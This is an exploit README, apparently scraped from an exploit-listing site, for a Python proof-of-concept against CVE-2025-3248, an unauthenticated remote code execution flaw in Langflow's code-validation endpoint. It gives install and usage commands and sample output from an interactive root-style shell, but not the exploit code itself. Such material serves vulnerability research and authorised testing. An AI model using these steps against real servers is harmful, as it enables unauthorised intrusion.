## https://sploitus.com/exploit?id=ED40D052-2CCE-561C-97A4-EBBC4AC72AA7
# CVE-2025-3248 โ Langflow AI Remote Code Execution (Unauthenticated)
**Author:** 0xgh057r3c0n
---
## Description
This exploit targets a critical unauthenticated RCE vulnerability (CVE-2025-3248) in Langflow AI. The vulnerability allows an attacker to execute arbitrary system commands on the target server via the `/api/v1/validate/code` endpoint.
This proof-of-concept (PoC) tool provides an interactive shell for testing and demonstrating the issue.
---
## Prerequisites
* Python 3.8 or newer
* `pip3` for installing dependencies
---
## Installation
### 1. Clone the Repository
```bash
git clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
```
### 2. Install Python Dependencies
```bash
pip3 install -r requirements.txt
```
---
## Usage
```bash
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
```
### Example
```bash
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
```
You will be presented with an interactive shell:
```
0xgh057r3c0n@root๐$ whoami
langflow
0xgh057r3c0n@root๐$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
```
* To exit: type `exit` or `quit`
* Supports typical Linux/Unix shell commands
---
## Notes
* SSL verification is disabled (useful for testing self-signed certificates)
* This PoC is for educational and authorized testing purposes only
---
## License
This project is licensed under the MIT License โ see the [LICENSE](LICENSE) file for details.
---
## Disclaimer
This software is provided for educational and research purposes only.
The author assumes no liability for any misuse of this code.
Use only on systems you own or have explicit permission to test.